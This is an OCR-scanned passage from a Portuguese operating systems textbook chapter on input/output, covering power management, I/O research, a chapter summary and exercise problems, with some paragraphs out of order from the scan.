fim, ela vai desistir e ir dormir, pois a verificação contínua 
é muito ruim para o consumo de energia. Logo em segui- 
da, o produtor fornecerá mais dados, mas agora a pilha de 
rede está adormecida. Despertar a pilha leva tempo e atrasa 
a produção. Uma solução possível é jamais dormir, mas 
isso não é interessante, porque fazê-lo aumentaria o con- 
sumo de energia — exatamente o oposto do que estamos 
tentando conseguir. Uma solução mais atraente é executar 
a pilha de rede em um núcleo mais lento, de maneira que 
ele esteja constantemente ocupado (e desse modo, nunca 
durma), enquanto ainda reduz o consumo de energia. Se o 
núcleo da rede for desacelerado com cuidado, seu desem- 
penho será melhor do que em uma configuração em que 
todos os núcleos são incrivelmente rápidos. 


A memória 


Existem duas opções possíveis para poupar energia 
com a memória. Primeiro, a cache pode ser esvaziada 
e então desligada. Ela sempre pode ser recarregada da 
memória principal sem perda de informações. A recarga 
pode ser feita dinâmica e rapidamente; portanto, desli- 
gar a cache é como entrar em um estado de dormência. 

Uma opção mais drástica é escrever os conteúdos 
da memória principal para o disco, então desligar a própria 
memória. Essa abordagem é a hibernação, já que virtual- 
mente toda a energia pode ser cortada para a memória à 
custa de um tempo de recarga substancial, em especial se 
o disco estiver desligado, também. Quando a memória é 
desligada, a CPU tem de ser desligada também ou tem 


Capítulo 5 ENTRADA/SAÍDA | 293 


de executar a partir da ROM. Se a CPU estiver desliga- 
da, a interrupção que deve acorda-la precisa fazê-la saltar 
para o código na ROM de modo que a memória possa ser 
recarregada antes de ser usada. Apesar de toda a sobrecar- 
ga, desligar a memória por longos períodos de tempo (por 
exemplo, horas) pode valer a pena se reinicializá-la em 
alguns segundos for considerado muito mais desejável do 
que reinicializar o sistema operacional a partir do disco, o 
que muitas vezes leva um minuto ou mais. 


Comunicação sem fio 


Cada vez mais muitos computadores portáteis têm 
uma conexão sem fio para o mundo exterior (por exem- 
plo, internet). Os transmissores e receptores de rádio 
necessários são muitas vezes grandes consumidores de 
energia. Em particular, se o receptor de rádio estiver sem- 
pre ligado a fim de receber as mensagens que chegam 
do e-mail, a bateria pode ser consumida bem rápido. Por 
outro lado, se o rádio for desligado após, digamos, 1 mi- 
nuto de ociosidade, as mensagens que chegam podem ser 
perdidas, o que claramente não é desejável. 

Uma solução eficiente para esse problema foi pro- 
posta por Kravets e Krishnan (1998). O cerne da sua 
solução explora o fato de que os computadores móveis 
comunicam-se com estações-base fixas que têm grandes 
memórias e discos e nenhuma restrição de energia. O que 
eles propõem é que o computador móvel envie uma men- 
sagem para a estação-base quando estiver prestes a desli- 
gar o rádio. Daquele momento em diante, a estação-base 
armazena em seu disco as mensagens que chegarem. O 
computador móvel pode indicar explicitamente quan- 
to tempo ele está planejando dormir, ou simplesmente 
informar a estação-base quando ele ligar o rádio nova- 
mente. A essa altura, quaisquer mensagens acumuladas 
podem ser enviadas para ele. 

Mensagens de saída que são geradas enquanto o rá- 
dio está desligado são armazenadas no computador mó- 
vel. Se o buffer ameaça saturar, o rádio é ligado e a fila, 
transmitida para a estação-base. 

Quando o rádio deve ser desligado? Uma possibilida- 
de é deixar o usuário ou o programa de aplicação decidir. 
Outra é desligá-lo após alguns segundos de tempo ocioso. 
Quando ele deve ser ligado novamente? Mais uma vez, 
o usuário ou o programa poderiam decidir, ou ele pode- 
ria ser ligado periodicamente para conferir o tráfego que 
chega e transmitir quaisquer mensagens na fila. É claro, 
ele também deve ser ligado quando o buffer de saída está 
quase cheio. Várias outras heurísticas são possíveis. 

Um exemplo de uma tecnologia sem fio trabalhando 
com esse tipo de esquema de gerenciamento de energia 
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pode ser encontrado nas redes (“WiFi”) 802.11. Na 
802.11, um computador móvel pode notificar o ponto 
de acesso que ele vai dormir, mas despertará antes que 
a estação-base envie o próximo quadro de orientação 
(beacon frame). O ponto de acesso envia esses sinais 
periodicamente. Nesse momento, o ponto de acesso 
pode dizer ao computador que ele tem dados pendentes. 
Se não houver esses dados, o computador móvel pode 
dormir novamente até o próximo sinal. 


Gerenciamento térmico 


Uma questão de certa maneira diferente, mas ainda 
assim relacionada à energia, é o gerenciamento térmico. 
As CPUs modernas ficam extremamente quentes por 
causa de sua alta velocidade. Computadores de mesa 
em geral têm um ventilador elétrico interno para soprar 
o ar quente para fora do gabinete. Dado que a redução 
do consumo de energia normalmente não é uma questão 
fundamental com os computadores de mesa, o ventila- 
dor em geral está ligado o tempo inteiro. 

Com os notebooks a situação é diferente. O sistema 
operacional tem de monitorar a temperatura continua- 
mente. Quando chega próximo da temperatura máxima 
permitida, o sistema operacional tem uma escolha. Ele 
pode ligar o ventilador, o que faz barulho e consome 
energia. Alternativamente, ele pode reduzir o consumo 
de energia reduzindo a iluminação da tela, desaceleran- 
do a CPU, sendo mais agressivo no desligamento do 
disco, e assim por diante. 

Alguma entrada do usuário pode ser valiosa como 
um guia. Por exemplo, um usuário poderia especificar 
antecipadamente que o ruído do ventilador é desagradá- 
vel, assim o sistema operacional reduziria o consumo de 
energia em vez de ligá-lo. 


Gerenciamento de bateria 


Antigamente, uma bateria apenas fornecia corrente 
até se esgotar, momento em que ela parava. Não mais. 
Os dispositivos móveis usam baterias inteligentes ago- 
ra, que podem comunicar-se com o sistema operacional. 
Mediante uma solicitação do sistema operacional, elas 
podem dar retorno sobre coisas como a sua voltagem má- 
xima, voltagem atual, carga máxima, carga atual, taxa de 
descarga máxima e mais. A maioria dos dispositivos mó- 
veis tem programas que podem ser executados para ob- 
ter e exibir todos esses parâmetros. Baterias inteligentes 
também podem ser instruídas a mudar vários parâmetros 
operacionais sob controle do sistema operacional. 


Alguns notebooks têm múltiplas baterias. Quando o 
sistema operacional detecta que uma bateria está prestes 
a se esgotar, ele deve desativá-la e ativar outra gracio- 
samente, sem causar nenhuma falha durante a transição. 
Quando a bateria final está nas suas últimas forças, cabe 
ao sistema operacional avisar o usuário e então provocar 
um desligamento ordeiro, por exemplo, certificando-se 
de que o sistema de arquivos não seja corrompido. 


Interface do driver 


Vários sistemas operacionais têm um mecanismo 
elaborado para realizar o gerenciamento de energia cha- 
mado de interface avançada de configuração e ener- 
gia (Advanced Configuration and Power Interface 
— ACPI). O sistema operacional pode enviar quaisquer 
comandos para o driver requisitando informações so- 
bre as capacidades dos seus dispositivos e seus estados 
atuais. Essa característica é especialmente importante 
quando combinada com a característica plug and play, 
pois logo após a inicialização, o sistema operacional 
não faz nem ideia de quais dispositivos estão presentes, 
muito menos suas propriedades em relação ao consumo 
ou modo de gerenciamento de energia. 

Ele também pode enviar comandos para os drivers 
instruindo-os para cortar seus níveis de energia (com 
base nas capacidades a respeito das quais ele ficou sa- 
bendo antes, é claro). Há também algum tráfego no ou- 
tro sentido. Em particular, quando um dispositivo como 
um teclado ou um mouse detecta atividade após um 
período de ociosidade, esse é um sinal para o sistema 
voltar à operação (quase) normal. 


5.8.3 Questões dos programas aplicativos 


Até o momento examinamos as maneiras que o siste- 
ma operacional pode reduzir o uso de energia por meio de 
vários tipos de dispositivos. Mas existe outra abordagem 
também: dizer aos programas para usarem menos ener- 
gia, mesmo que isso signifique fornecer uma experiên- 
cia do usuário de pior qualidade (melhor uma experiência 
de pior qualidade do que nenhuma experiência quando 
a bateria morre e as luzes apagam). Tipicamente, essa 
informação é passada adiante quando a carga da bateria 
está abaixo de algum limiar. Cabe aos programas então 
decidirem entre degradar o desempenho para estender a 
vida da bateria, ou manter o desempenho e arriscar ficar 
sem energia. 

Uma questão que surge é como um programa pode 
degradar o seu desempenho para poupar energia. Essa 


questão foi estudada por Flinn e Satyanarayanan (2004). 
Eles forneceram quatro exemplos de como o desempe- 
nho degradado pode poupar energia. Vamos examiná- 
-los a seguir. 

Nesse estudo, as informações são apresentadas ao usu- 
ário de várias formas. Quando nenhuma degradação está 
presente, é apresentada a melhor informação possível. 
Quando a degradação está presente, a fidelidade (preci- 
são) da informação apresentada ao usuário é pior do que 
ela poderia ser. Veremos em breve exemplos disso. 

A fim de mensurar o uso de energia, Flinn e Satya- 
narayanan desenvolveram uma ferramenta de software 
chamada PowerScope. O que ela faz é fornecer um per- 
fil de uso de energia de um programa. Para usá-la, um 
computador precisa estar conectado a um suprimento 
externo de energia através de um multímetro digital 
controlado por software. Usando o multímetro, o soft- 
ware é capaz de ler o numero de miliampéres que estão 
chegando do suprimento de energia e assim determinar 
a energia instantânea consumida pelo computador. O 
que a PowerScope faz é amostrar periodicamente o con- 
tador do programa e o uso de energia, e escrever esses 
dados para um arquivo. Após o programa ter sido con- 
cluído, o arquivo é analisado para dar o uso de energia 
de cada rotina. Essas medidas formaram a base das suas 
observações. Medidas de economia de energia também 
foram usadas e formaram as linhas de base pelas quais 
o desempenho degradado foi mensurado. 

O primeiro programa mensurado foi um reprodutor 
de vídeo. No modo sem degradação, ele reproduz 30 
quadros/s em uma resolução total e em cores. Uma forma 
de degradação é abandonar a informação das cores e exi- 
bir o vídeo em preto e branco. Outra forma de degradação 
é reduzir a frequência de reprodução, o que faz a imagem 
piscar (flicker) e deixa o filme com uma qualidade irregu- 
lar. Ainda outra forma de degradação é reduzir o número 
de pixels em ambas as direções, seja reduzindo a resolu- 
ção espacial ou tornando a imagem exibida menor. Me- 
didas desse tipo pouparam em torno de 30% da energia. 

O segundo programa foi um reconhecedor de voz. Ele 
coletava amostras do microfone e construia um modelo de 
onda. Esse modelo de onda podia ser analisado no note- 
book ou ser enviado por um canal de rádio para análise em 
um computador fixo. Fazer isso poupa energia da CPU, 
mas usa energia para o rádio. A degradação foi conseguida 
usando um vocabulário menor e um modelo acústico mais 
simples. O ganho aqui foi de aproximadamente 35%. 

O exemplo seguinte foi um programa visualizador 
de mapas que buscava o mapa por um canal de rádio. 
A degradação consistia em cortar o mapa para dimen- 
sões menores ou dizer ao servidor remoto para omitir 
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estradas menores, desse modo exigindo menos bits para 
serem transmitidos. Mais uma vez aqui foi conseguido 
um ganho de aproximadamente 35%. 

O quarto experimento foi com a transmissão de ima- 
gens JPEG para um navegador na internet. O padrão 
JPEG permite vários algoritmos, negociando entre a 
qualidade da imagem e o tamanho do arquivo. Aqui o 
ganho foi em média 9%. Ainda assim, como um todo, 
os experimentos mostraram que ao aceitar alguma de- 
gradação de qualidade, o usuário pode dispor de uma 
determinada bateria por mais tempo. 


5.9 Pesquisas em entrada/saída 


Há uma produção considerável de pesquisas sobre 
entrada/saída. Parte delas concentra-se em dispositivos 
específicos, em vez da E/S em geral. Outros trabalhos 
concentram-se na infraestrutura de E/S inteira. Por 
exemplo, a arquitetura Streamline busca fornecer E/S 
sob medida para cada aplicação, que minimize a sobre- 
carga devido a cópias, chaveamento de contextos, sina- 
lização e uso equivocado da cache e TLB (DEBRUIJN 
etal., 2011). Ela é baseada na noção de Beltway Buffers, 
buffers circulares avançados que são mais eficientes 
do que os sistemas de buffers existentes (DEBRUIJN 
e BOS, 2008). O streamline é especialmente útil para 
aplicações com exigentes demandas de rede. Megapipe 
(HAN et al., 2012) é outra arquitetura de E/S em rede 
para cargas de trabalho orientadas a mensagens. Ela cria 
canais bidirecionais por núcleo de CPU entre o núcleo 
do SO e o espaço do usuário, sobre os quais os sistemas 
depositam camadas de abstrações como soquetes leves. 
Esses soquetes não são totalmente compatíveis com o 
POSIX, de maneira que aplicações precisam ser adapta- 
das para beneficiar-se da E/S mais eficiente. 

Muitas vezes, a meta da pesquisa é melhorar o de- 
sempenho de um dispositivo de uma maneira ou de 
outra. Os sistemas de discos são um desses casos. Os 
algoritmos de escalonamento de braço de disco são 
uma área de pesquisa sempre popular. Às vezes o foco 
é a melhoria do desempenho (GONZALEZ-FEREZ et 
al., 2012; PRABHAKAR et al., 2013; ZHANG et al., 
2012b), mas às vezes é o uso mais baixo de energia 
(KRISH et al., 2013; NIJIM et al., 2013; ZHANG et 
al., 2012a). Com a popularidade da consolidação de ser- 
vidores usando máquinas virtuais, o escalonamento de 
disco para sistemas virtualizados tornou-se um tópico 
em alta (JIN et al., 2013; LING et al., 2012). 

Nem todos os tópicos são novos, no entanto. O velho 
RAID ainda é bastante pesquisado (CHEN et al., 2013; 
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MOON e REDDY, 2013; TIMCENKO e DJORDJE- 
VIC, 2013), assim como os SSDs (DAYAN et al., 2013; 
KIM et al., 2013; LUO et al., 2013). Na frente teórica, 
alguns pesquisadores estão examinando a modelagem 
de sistemas de discos a fim de compreender melhor seu 
desempenho sob diferentes cargas de trabalho (LI et al., 
2013b; SHEN e QI, 2013). 

Os discos não são o único dispositivo de E/S na linha 
de frente das pesquisas. Outra área de pesquisa funda- 
mental relacionada à E/S são as redes. Os tópicos incluem 
o uso de energia (HEWAGE e VOIGT, 2013; HOQUE et 
al., 2013), redes para centros de processamento de dados 
(HAITJEMA, 2013; LIU et al., 2103; SUN et al., 2013), 
qualidade do serviço (GUPTA, 2013; HEMKUMAR e 
VINAYKUMAR, 2012; LAI e TANG, 2013) e desempe- 
nho (HAN et al., 2012; SOORTY, 2012). 

Dado o grande número de cientistas da computação 
com notebooks e dado o tempo de vida microscópico 
de bateria na maioria deles, não deve causar surpresa 
que haja um tremendo interesse na utilização de técni- 
cas de software para a redução do consumo de energia. 
Entre os tópicos especializados sendo examinados es- 
tão o equilíbrio da velocidade do relógio em diferentes 
núcleos para alcançar um desempenho suficiente sem 
desperdiçar energia (HRUBY, 2013), uso de energia e 
qualidade do serviço (HOLMBACKA et al., 2013), es- 
timar o uso de energia em tempo real (DUTTA et al., 
2013), fornecer serviços de SO para gerenciar o uso de 
energia (WEISSEL, 2012), examinar o custo de energia 
da segurança (K ABRI e SERET, 2009) e escalonamen- 
to para multimídia (WEI et al., 2010). 

Nem todos estão interessados em notebooks, no en- 
tanto. Alguns cientistas de computação pensam grande e 
querem poupar megawatts em centros de processamen- 
to de dados (FETZER e KNAUTH, 2012; SCHWARTZ 
et al., 2012; WANG et al., 2013b; YUAN et al., 2012). 


5.10 Resumo 


A entrada/saída é um tópico importante, mas muitas 
vezes negligenciado. Uma fração substancial de qual- 
quer sistema operacional diz respeito à E/S. A E/S pode 
ser conseguida de três maneiras. Primeiro, há a E/S pro- 
gramada, na qual a CPU principal envia ou recebe cada 
byte ou palavra e aguarda em um laço estreito esperando 
até que possa receber ou enviar o próximo byte ou pala- 
vra. Segundo, há a E/S orientada à interrupção, na qual 
a CPU inicia uma transferência de E/S para um carac- 
tere ou palavra e vai fazer outra coisa até a interrupção 
chegar sinalizando a conclusão da E/S. Terceiro, há o 


Na outra extremidade do espectro, um tópico muito em 
alta é o uso de energia em redes de sensores (ALBATH et 
al., 2013; MIKHAYLOV e TERVONEN, 2013; RASA- 
NEH e BANIROSTAM, 2013; SEVERINI et al., 2012). 

De certa maneira surpreendente, mesmo o simples 
relógio ainda é pesquisado. Para fornecer uma boa reso- 
lução, alguns sistemas operacionais executam o relógio 
a 1000 Hz, o que leva a uma sobrecarga substancial. A 
pesquisa entra com o intuito de livrar-se dessa sobrecar- 
ga (TSAFIR et al., 2005). 

Similarmente, a latência de interrupções ainda é uma 
preocupação para os grupos de pesquisa, em especial na 
área dos sistemas operacionais em tempo real. Tendo 
em vista que elas são muitas vezes encontradas embar- 
cadas em sistemas críticos (como controles de freio e 
sistemas de direção), permitir interrupções somente em 
pontos de preempção bastante específicos capacita o 
sistema a controlar possíveis entrelaçamentos e permite 
o uso da verificação formal para melhorar a confiabili- 
dade (BLACKHAM et al., 2012). 

Drivers de dispositivos também são uma área de 
pesquisa muito ativa. Muitas falhas de sistemas ope- 
racionais são causadas por drivers de dispositivos de- 
feituosos. Em Symdrive, os autores apresentam uma 
estrutura para testar drivers de dispositivos sem real- 
mente comunicar-se com os dispositivos (RENZEL- 
MANN etal., 2012). Como uma abordagem alternativa, 
RHYZIK et al. (2009) mostram como drivers de dispo- 
sitivos podem ser construídos automaticamente a partir 
de especificações, com uma probabilidade menor de 
ocorrerem defeitos. 

Clientes magros também são um tópico que gera in- 
teresse, especialmente dispositivos móveis conectados 
à nuvem (HOCKING, 2011; TUAN-ANH et al., 2013). 
Por fim, existem alguns estudos sobre tópicos incomuns 
como prédios como grandes dispositivos de E/S (DAW- 
SON-HAGGERTY et al., 2013). 


DMA, no qual um chip separado gerencia a transferên- 
cia completa de um bloco de dados, gerando uma inter- 
rupção somente quando o bloco inteiro foi transferido. 
A E/S pode ser estruturada em quatro níveis: as roti- 
nas de tratamento de interrupção, os drivers de disposi- 
tivos, o software de E/S independente do dispositivo, e 
as bibliotecas de E/S e spoolers que executam no espaço 
do usuário. Os drivers do dispositivo lidam com os deta- 
lhes da execução dos dispositivos e com o fornecimento 
de interfaces uniformes para o resto do sistema opera- 
cional. O software de E/S independente do dispositivo 


realiza atividades como o armazenamento em buffers e 
relatórios de erros. 

Os discos vêm em uma série de tipos, incluindo dis- 
cos magnéticos, RAIDS, pen-drives e discos ópticos. 
Nos discos rotacionais, os algoritmos de escalonamento 
do braço do disco podem ser usados muitas vezes para 
melhorar o desempenho do disco, mas a presença de 
geometrias virtuais complica as coisas. Pareando dois 
discos, pode ser construído um meio de armazenamento 
estável com determinadas propriedades úteis. 

Relógios são usados para manter um controle do 
tempo real — limitando o tempo que os processos 
podem ser executados —, lidar com temporizadores 
watchdog e contabilizar o uso da CPU. 

Terminais orientados por caracteres têm uma série 
de questões relativas a caracteres especiais que podem 
ser entrada e sequências de escape especiais que podem 
ser saída. A entrada pode ser em modo cru ou modo co- 
zido, dependendo de quanto controle o programa quer 
sobre ela. Sequências de escape na saída controlam o 
movimento do cursor e permitem a inserção e remoção 
de texto na tela. 

A maioria dos sistemas UNIX usa o Sistema X 
Window como base de sua interface do usuário. Ele 


PROBLEMAS 


1. Avanços na tecnologia de chips tornaram possível co- 
locar o controlador inteiro, incluindo toda a lógica de 
acesso do barramento, em um chip barato. Como isso 
afeta o modelo da Figura 1.6? 

2. Dadas as velocidades listadas na Figura 5.1, é possível 
escanear documentos de um scanner e transmiti-los atra- 
vés de uma rede de 802,11 g na velocidade máxima? 
Defenda sua resposta. 

3. A Figura 5.3(b) mostra uma maneira de conseguir a 
E/S mapeada na memória mesmo na presença de barra- 
mentos separados para dispositivos de memória e, E/S, 
a saber, primeiro tentar o barramento de memória e, se 
isso falhar, tentar o barramento de E/S. Um estudante de 
computação inteligente pensou em uma melhoria para 
essa ideia: tentar ambos em paralelo, a fim de acelerar 
o processo de acessar dispositivos de E/S. O que você 
acha dessa ideia? 

4. Explique os ganhos e perdas entre interrupções precisas 
e imprecisas em uma máquina superescalar. 

5. Um controlador de DMA tem cinco canais. O contro- 
lador é capaz de solicitar uma palavra de 32 bits a cada 
40 ns. Uma resposta leva um tempo igualmente longo. 
Quão rápido o barramento precisar ser para evitar ser um 
gargalo? 
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consiste em programas que são ligados a bibliotecas 
especiais que emitem comandos de desenho e um ser- 
vidor X que escreve na tela. 

Muitos computadores usam GUIs para sua saída. Es- 
ses são baseados no paradigma WIMP: janelas, ícones, 
menus e um dispositivo apontador (Windows, Icons, Me- 
nus, Pointing device). Programas baseados em GUIs são 
geralmente orientados a eventos, com eventos do teclado, 
mouse e outros sendo enviados para o programa para se- 
rem processados tão logo eles acontecem. Em sistemas 
UNIX, os GUIs quase sempre executam sobre o X. 

Clientes magros têm algumas vantagens sobre os 
PCs padrão, notavelmente por sua simplicidade e me- 
nos manutenção para os usuários. 

Por fim, o gerenciamento de energia é uma questão 
fundamental para telefones, tablets e notebooks, pois 
os tempos de vida das baterias são limitados, e para os 
computadores de mesa e de servidores devido às contas 
de luz da organização. Várias técnicas podem ser em- 
pregadas pelo sistema operacional para reduzir o con- 
sumo de energia. Programas também podem ajudar ao 
sacrificar alguma qualidade por mais tempo de vida das 
baterias. 


6. Suponha que um sistema usa DMA para a transferência de 
dados do controlador do disco para a memória principal. 
Além disso, presuma que são necessários £, ns em mé- 
dia para adquirir o barramento e ¢, ns para transferir uma 
palavra através do barramento (¢, >> ¢,). Após a CPU ter 
programado o controlador de DMA, quanto tempo será 
necessário para transferir 1.000 palavras do controlador 
do disco para a memória principal, se (a) o modo uma- 
-palavra-de-cada-vez for usado, (b) o modo de surto for 
usado? Presuma que o comando do controlador de disco 
exige adquirir o barramento para enviar uma palavra e o 
reconhecimento de uma transferência também exige ad- 
quirir o barramento para enviar uma palavra. 

7. Um modo que alguns controladores de DMA usam é o 
controlador do dispositivo enviar a palavra para o con- 
trolador de DMA, que então emite uma segunda soli- 
citação de barramento para escrever para a memória. 
Como esse modo pode ser usado para realizar uma cópia 
memória para memória? Discuta qualquer vantagem ou 
desvantagem de usar esse método em vez de usar a CPU 
para realizar uma cópia memória para memória. 

8. Suponha que um computador consiga ler ou escrever uma 
palavra de memória em 5 ns. Também suponha que, quan- 
do uma interrupção ocorrer, todos os 32 registradores da 
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CPU, mais o contador do programa e PSW são empurra- 
dos para a pilha. Qual é o número máximo de interrupções 
por segundo que essa máquina pode processar? 
Projetistas de CPUs sabem que projetistas de sistemas 
operacionais detestam interrupções imprecisas. Uma 
maneira de agradar ao pessoal do SO é fazer que a CPU 
pare de emitir novas instruções quando uma interrupção 
é sinalizada, mas permitir que todas as instruções que 
atualmente estão sendo executadas sejam concluídas, 
então forçar a interrupção. Essa abordagem tem alguma 
desvantagem? Explique a sua resposta. 

Na Figura 5.9(b), a interrupção não é reconhecida até 
depois de o caractere seguinte ter sido enviado para a 
impressora. Ele poderia ter sido reconhecido logo no iní- 
cio da rotina do serviço de interrupção? Se a resposta for 
sim, dê uma razão para fazê-lo ao fim, como no texto. Se 
não, por quê? 

Um computador tem um pipeline de três estágios como 
mostrado na Figura 1.7(a). Em cada ciclo do relógio, uma 
instrução nova é buscada da memória no endereço apon- 
tado pelo PC, colocado no pipeline e o PC incrementado. 
Cada instrução ocupa exatamente uma palavra de memó- 
ria. As instruções que já estão no pipeline são avançadas 
em um estágio. Quando ocorre uma interrupção, o PC 
atual é colocado na pilha, e o PC é configurado para o 
endereço do tratador da interrupção. Então o pipeline é 
deslocado um estágio para a direita e a primeira instrução 
do tratador da interrupção é buscada no pipeline. Essa má- 
quina tem interrupções precisas? Defenda sua resposta. 
Uma página de texto impressa típica contém 50 linhas de 
80 caracteres cada. Imagine que uma determinada impres- 
sora possa imprimir 6 páginas por minuto e que o tempo 
para escrever um caractere para o registrador de saída da 
impressora é tão curto que ele pode ser ignorado. Faz sen- 
tido executar essa impressora usando a E/S orientada pela 
interrupção se cada caractere impresso exige uma inter- 
rupção que leva ao todo 50 us para servir? 

Explique como um SO pode facilitar a instalação de um 
dispositivo novo sem qualquer necessidade de recompi- 
lar o SO. 


Em qual das quatro camadas de software de E/S cada 

uma das tarefas a seguir é realizada: 

(a) Calcular a trilha, setor e cabeçote para uma leitura 
de disco. 

(b) Escrever comandos para os registradores do 
dispositivo. 

(c) Conferir se o usuário tem permissão de usar o 
dispositivo. 

(d) Converter inteiros binários em ASCII para impressão. 

Uma rede de área local é usada como a seguir. O usuário 

emite uma chamada de sistema para escrever pacotes de 

dados para a rede. O sistema operacional então copia os 
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dados para um buffer do núcleo e, a seguir, copia os dados 
para a placa do controlador da rede. Quando todos os bytes 
estão seguramente dentro do controlador, eles são enviados 
através da rede a uma taxa de 10 megabits/s. O controla- 
dor da rede receptora armazena cada bit um microssegun- 
do após ele ter sido enviado. Quando o último bit chega, a 
CPU de destino é interrompida, e o núcleo copia o pacote 
recém-chegado para um buffer do núcleo inspecioná-lo. 
Uma vez que ele tenha descoberto para qual usuário é o 
pacote, o núcleo copia os dados para o espaço do usuário. 
Se presumirmos que cada interrupção e seu processamento 
associado leva 1 ms, que pacotes têm 1024 bytes (ignore 
os cabeçalhos) e que copiar um byte leva 1 us, qual é a fre- 
quência máxima que um processo pode enviar dados para 
outro? Presuma que o emissor esteja bloqueado até que o 
trabalho tenha sido concluído no lado receptor e que uma 
mensagem de reconhecimento retorne. Para simplificar a 
questão, presuma que o tempo para receber o reconheci- 
mento de volta é pequeno demais para ser ignorado. 

Por que arquivos de saída para a impressora normal- 
mente passam por um spool no disco antes de serem 
impressos? 

Quanto deslocamento de cilindro é necessário para um 
disco de 7200 RPM com um tempo de busca de trilha 
para trilha de 1 ms? O disco tem 200 setores de 512 
bytes cada em cada trilha. 

Um disco gira a 7200 RPM. Ele tem 500 setores de 512 
bytes em torno do cilindro exterior. Quanto tempo ele 
leva para ler um setor? 

Calcule a taxa de dados máxima em bytes/s para o disco 
descrito no problema anterior. 

RAID nível 3 é capaz de corrigir erros de bit único usan- 
do apenas uma unidade de paridade. Qual é o sentido do 
RAID nível 2? Afinal de contas, ele só pode corrigir um 
erro e precisa de mais unidades para fazê-lo. 

Um RAID pode falhar se duas ou mais das suas uni- 
dades falharem dentro de um intervalo de tempo curto. 
Suponha que a probabilidade de uma unidade falhar em 
uma determinada hora é p. Qual é a probabilidade de um 
RAID com k unidades falhar em uma determinada hora? 
Compare o RAID nível O até 5 em relação ao desem- 
penho de leitura, desempenho de escrita, sobrecarga de 
espaço e confiabilidade. 

Quantos pebibytes há em um zebibyte? 

Por que os dispositivos de armazenamento óptico são 
inerentemente capazes de uma densidade de dados mais 
alta que os dispositivos de armazenamento magnético? 
Nota: esse problema exige algum conhecimento de fisi- 
ca do Ensino Médio e como os campos magnéticos são 
gerados. 

Quais são as vantagens e as desvantagens dos discos óp- 
ticos versus os discos magnéticos? 
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Se um controlador de disco escreve os bytes que ele re- 
cebe do disco para a memória tão rápido quanto ele os 
recebe, sem armazenamento interno, o entrelaçamento é 
concebivelmente útil? Explique. 
Se um disco tem entrelaçamento duplo, ele também pre- 
cisa de deslocamento do cilindro a fim de evitar perder 
dados quando realizando uma busca de trilha para trilha? 
Discuta sua resposta. 
Considere um disco magnético consistindo de 16 cabe- 
ças e 400 cilindros. Esse disco tem quatro zonas de 100 
cilindros com os cilindros nas zonas diferentes contendo 
160, 200, 240 e 280 setores, respectivamente. Presuma 
que cada setor contenha 512 bytes, que o tempo de busca 
médio entre cilindros adjacentes é 1 ms, e o disco gira a 
7200 RPM. Calcule a (a) capacidade do disco, (b) des- 
locamento de trilha ótimo e (c) taxa de transferência de 
dados máxima. 
Um fabricante de discos tem dois discos de 5,25 pole- 
gadas, com 10.000 cilindros cada um. O mais novo tem 
duas vezes a densidade de gravação linear que o mais 
velho. Quais propriedades de disco são melhores na uni- 
dade mais nova e quais são as mesmas? Há alguma pior 
na unidade mais nova? 
Um fabricante de computadores decide redesenhar a 
tabela de partição de um disco rígido Pentium para 
gerar mais do que quatro partições. Cite algumas das 
consequências dessa mudança. 
Solicitações de disco chegam ao driver do disco para os 
cilindros 10, 22, 20, 2, 40, 6 e 38, nessa ordem. Uma 
busca leva 6 ms por cilindro. Quanto tempo de busca é 
necessário para: 
(a) Primeiro a chegar, primeiro a ser servido. 
(b) Cilindro mais próximo em seguida. 
(c) Algoritmo do elevador (inicialmente deslocando-se 
para cima). 
Em todos os casos, o braço está inicialmente no cilin- 
dro 20. 
Uma ligeira modificação do algoritmo do elevador para 
o escalonamento de solicitações de disco é sempre var- 
rer na mesma direção. Em qual sentido esse algoritmo 
modificado é melhor do que o algoritmo do elevador? 
Um vendedor de computadores pessoais visitando uma 
universidade na região sudoeste de Amsterdã observou 
durante seu discurso de venda que a sua empresa ha- 
via devotado um esforço substancial para tornar a sua 
versão do UNIX muito rápida. Como exemplo, ele ob- 
servou que o seu driver do disco usava o algoritmo do 
elevador e também deixava em fila múltiplas solicita- 
ções dentro de um cilindro por ordem do setor. Um es- 
tudante, Harry Hacker, ficou impressionado e comprou 
um. Ele o levou para casa e escreveu um programa para 
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ler aleatoriamente 10.000 blocos espalhados pelo disco. 
Para seu espanto, o desempenho que ele mensurou foi 
idêntico ao que era esperado do primeiro a chegar, pri- 
meiro a ser servido. O vendedor estava mentindo? 
Na discussão a respeito de armazenamento estável usan- 
do RAM não volátil, o ponto a seguir foi minimizado. 
O que acontece se a escrita estável termina, mas uma 
queda do sistema ocorre antes que o sistema operacional 
possa escrever um número de bloco inválido na RAM 
não volátil? Essa condição de corrida arruína a abstração 
do armazenamento estável? Explique a sua resposta. 
Na discussão sobre armazenamento estável, foi demons- 
trado que o disco pode ser recuperado para um estado 
consistente (uma escrita é concluída ou nem chega a 
ocorrer) se a falha da CPU ocorrer durante uma escrita. 
Essa propriedade se manterá se a CPU falhar novamente 
durante a rotina de recuperação? Explique sua resposta. 
Na discussão sobre armazenamento estável, uma su- 
posição fundamental é de que uma falha na CPU que 
corrompe um setor leva a um ECC incorreto. Quais pro- 
blemas podem surgir nos cenários de cinco recuperações 
de falhas mostrados na Figura 5.27 se essa suposição 
não se mantiver? 
O tratador de interrupção do relógio em um determinado 
computador exige 2 ms (incluindo a sobrecarga de troca 
de processo) por tique do relógio. O relógio executa a 
60 Hz. Qual fração da CPU é devotada ao relógio? 
Um computador usa um relógio programável em modo 
de onda quadrada. Se um cristal de 500 MHz for usado, 
qual deveria ser o valor do registrador (holding register) 
para atingir uma resolução de relógio de 
(a) um milissegundo (um tique de relógio a cada 
milissegundo)? 
(b) 100 microssegundos? 
Um sistema simula múltiplos relógios encadeando jun- 
tas todas as solicitações de relógio pendentes como mos- 
trado na Figura 5.30. Suponha que o tempo atual seja 
5000 e existem solicitações de relógio pendentes para 
o tempo 5008, 5012, 5015, 5029 e 5037. Mostre os va- 
lores do cabeçalho do relógio, Tempo atual e próximo 
sinal nos tempos 5000, 5005 e 5013. Suponha que um 
novo sinal (pendente) chegue no tempo 5017 para 5033. 
Mostre os valores do cabeçalho do relógio, Tempo atual 
e Próximo sinal no tempo 5023. 
Muitas versões do UNIX usam um inteiro de 32 bits 
sem sinal para controlar o tempo como o número de 
segundos desde a origem do tempo. Quando esses sis- 
temas entrarão em colapso (ano e mês)? Você acha que 
isso vai realmente acontecer? 
Um terminal de mapas de bits contém 1600 por 1200 pi- 
xels. Para deslizar o conteúdo de uma janela, a CPU (ou 
controlador) tem de mover todas as linhas do texto para 


